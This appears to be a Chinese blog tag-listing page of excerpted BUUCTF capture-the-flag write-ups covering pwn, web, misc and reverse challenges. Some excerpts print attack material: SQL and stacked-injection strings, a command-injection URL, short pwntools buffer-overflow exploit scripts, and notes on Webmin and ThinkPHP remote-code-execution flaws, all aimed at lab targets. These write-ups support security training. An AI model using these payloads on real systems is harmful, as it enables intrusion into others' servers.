首页 > TAG信息列表 > BUUOJ

CTF-Buuoj-Pwn-[第五空间2019 决赛]PWN5

格式化字符串 #----------------------------------------------------------------------------------------------- # coding:UTF-8 | # author:zxcyyyyy000

CTF-Buuoj-Pwn-pwn1_sctf_2016

#----------------------------------------------------------------------------------------------- # coding:UTF-8 | # author:zxcyyyyy000

buuoj 30天misc计划(0x01)

[GXYCTF2019]gakki 下载附件,得到一张图片 先查看EXIF,没有什么有用的信息 拿binwalk查看 发现隐写了一个压缩包,使用binwalk -e命令提取,发现包太大了 改用foremost提取文件 得到一个压缩包 由于题目没给任何信息,查看该压缩包是否为伪加密 该压缩包并非伪加密,这个时候我们有两个想

BUUCTF:[GKCTF 2021]0.03

题目来源:https://buuoj.cn/challenges#[GKCTF%202021]0.03 secret.txt奇奇怪怪 压缩包名字叫flag_in_the_disk,那么把它挂载 被加密 ntfs隐写  三分密码  成功挂载 flag{85ec0e23-ebbe-4fa7-9c8c-e8b743d0d85c}

[极客大挑战 2019]BabySQL

打开靶机 来了个加强版本的sql注入,不过我们先输入账号密码看有什么反应   整一手万能密码,闭合双引号?username=admin' or '1'='1%23&password=123 然后报错了,说密码错误,然后我们重新构造我们试着查看字段?username=admin&password=123' order by 3 我们可以看到order by 3 变

[GXYCTF2019]Ping Ping Ping

[GXYCTF2019]Ping Ping Ping 首先简单测试一下题目 0x00 首先打开题目环境 界面上只有/?ip= 感觉和之前做过的一道ping的题目十分相像 0x01 首先随便ping一下 0x02 有正常的回显 然后试一下ls http://7ee88f12-0ce0-4ffa-92ed-c77d51f1e289.node3.buuoj.cn/?ip=127.0.01;ls 0x0

re | buuoj findKey

re | buuoj findKey 新年第一题,开卷! vc6 win32gui程序 比较有趣和基础的题目 消息处理函数非常清晰,通过字符串定位就能找到: 重点关注这一块儿就行了 具体流程就是有一个6位数做了个hash,然后hash的结果是xor过的,解一下就能得到hash过的结果,然后直接去cmd5查一下: 莽出来以后最后是

BUUCTF:[UTCTF2020]File Carving

题目来源:https://buuoj.cn/challenges#[UTCTF2020]File%20Carving 题给了张png stegsolve看了一下发现有隐写 看来不是从这入手 010看 文件尾跟了个zip foremost分离 得到ELF文件 运行即得到:flag{2fbe9adc2ad89c71da48cabe90a121c0}

BUUCTF:[QCTF2018]X-man-A face

题目来源:https://buuoj.cn/challenges#[QCTF2018]X-man-A%20face 题给了张png 给他补一下 扫码得:KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I= base32 得flag{Pretty_Sister_Who_Buys_Me_Lobster}

BUUCTF:[MRCTF2020]不眠之夜

题目来源:https://buuoj.cn/challenges#[MRCTF2020]%E4%B8%8D%E7%9C%A0%E4%B9%8B%E5%A4%9C 拼图 flag{Why_4re_U_5o_ShuL1an??}

BUUCTF:[BSidesSF2019]zippy

题目来源:https://buuoj.cn/challenges#[BSidesSF2019]zippy 流量题 打开发现只有TCP流 追踪一下 得到一个zip的密码:supercomplexpassword binwalk得到flag.zip 解压 flag{this_flag_is_your_flag}

Web-[极客大挑战 2019]Http

打开题目,F12查看源代码: 发现一个secret.php文件,点开试试 emmmmmm 提示要从https://Sycsecret.buuoj.cn这个页面跳转 使用burpsuite试试,将抓到的包发送到repeater模块添加一行 Referer:https://Sycsecret.buuoj.cn Go试试,接着就得到了第二个提示,题目要求我们使用 ‘Syclover’

Buuctf Http

打开该靶机,发现该靶机为一个普通的页面 查看一下该网页的源码  发现有一个Secret.php的网页,打开该网页 这里提示我们需要从https://Sycsecret.buuoj.cn去访问该网页 利用Burpsuite对该网页进行抓包,添加referer值 Referer: https://Sycsecret.buuoj.cn 添加完referer值后发

buuoj [强网杯]随便注(堆叠注入,prepare预定义)

输入1 输入2 输入3,无显示。 输入-1' or 1=1,得到 order判断字段数为3 union select,回显被过滤的函数: 但是没有过滤show 等。 利用show命令 1';show tables;# 得到两个表:1919810931114514和words: 查看表1919810931114514的字段: 1';show columns from 1919810931114514;# 1'

Buuoj [HCTF 2018]WarmUp

源码看到source.php 和hint.php hint: flag not here, and flag in ffffllllaaaagggg source.php: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) //check函数 { $whitelist = ["source"=>"source.php",&q

【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

漏洞简介 Webmin 是一个用于管理类 Unix 系统的管理配置工具,具有 Web 页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。 漏洞靶场 BUUCTF 的 Real 分类下,[Webmin]CVE-2019-15107 模块。 复现过程 直接进入提示内容如下: 在 UR

[ThinkPHP]2-Rce buuoj

[ThinkPHP]2-Rce 进来是这个页面 构造路径。 好,构造正确,但是服务器拦截了对该操作的访问 打开提示网站,看到关键信息 分析正则 老版本的正则可以用 ’@‘符号表示模式。以下正则是模式e preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', impl

[GKCTF2021]easycms

[GKCTF2021]easycms 扫到admin.php 官方提示了,后台密码为5位数字的, 盲猜账号admin密码12345 登录到后台 点击:设计->导出主题->保存 然后复制下载的主题的链接 http://caf73c4b-734b-495b-b898-dc46661beb7f.node4.buuoj.cn/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d

2021-07-13 CTF Re buuoj day17

CTF Reverse buu oj day17 SimpleRev题目分析解题 findit题目分析解题 SimpleRev 题目分析 下载题目附件是64位elf文件 加载到IDA后,F5查看伪代码,Congratulation!的条件是if(!strcmp(text,str2)),即text和str2相等。 text是两个字符串join,, key3=‘kills’ v9=0x776F6461

第一题——test_your_nc

题目地址:https://buuoj.cn/challenges 解题思路 第一步:打开ubuntu,在控制台上输入 nc+网址+端口号 第二步:cat /flag获取flag

Buuoj 被嗅探的流量

Buuoj 被嗅探的流量 这个点进去之后看到了很像flag的内容 这个好像就是 也可以右键Analyse→Follow→TCP Stream或HTTP stream

buuoj warmup_csaw_2016

放进IDA,找到gets 接收0x40位,然后查看字符串,虽然没有bin/sh,但是有能直接用的 找到所在函数和地址 exp: from pwn import * p=remote('node3.buuoj.cn',27180) sys_addr=0x40060D payload='a'*(0x40+8)+p64(sys_addr) p.sendline(payload) p.interactive() 这里有个不太清楚的+

BUUCTF(PWN)suctf_2018_stack

from pwn import * p = remote('node3.buuoj.cn',29039) ret_addr = 0x0400677 payload = 'a' * (0x20 + 8) + p64(ret_addr) p.send(payload) p.interactive() 不是676的原因是 这道题检查的其实是栈平衡的问题,因为是Ubuntu18,需要栈对齐

从0到1CTFer成长之路-第二章-XSS的魔力

XSS的魔力 声明 好好向大佬们学习!!! 攻击 XSS的魔力 这简直就是一场javascript的代码审计心酸历程 摘自 https://book.nu1l.com/tasks/#/ https://blog.csdn.net/hxhxhxhxx/article/details/112784856 https://blog.csdn.net/rfrder/article/details/108930033 使用BUUCTF在

网络安全之web安全(四)SSRF

[第二章 web进阶]SSRF 一、信息收集 介绍:记录一下笔记,方便以后迅速回忆使用。 一、信息收集 1.首页 bp手抓的包通过post请求提交URL POST / HTTP/1.1 Host: c0b4a054-af89-447a-a1f7-456148d6e9fe.node3.buuoj.cn Content-Length: 11 Cache-Control: max-age=0 Upgrade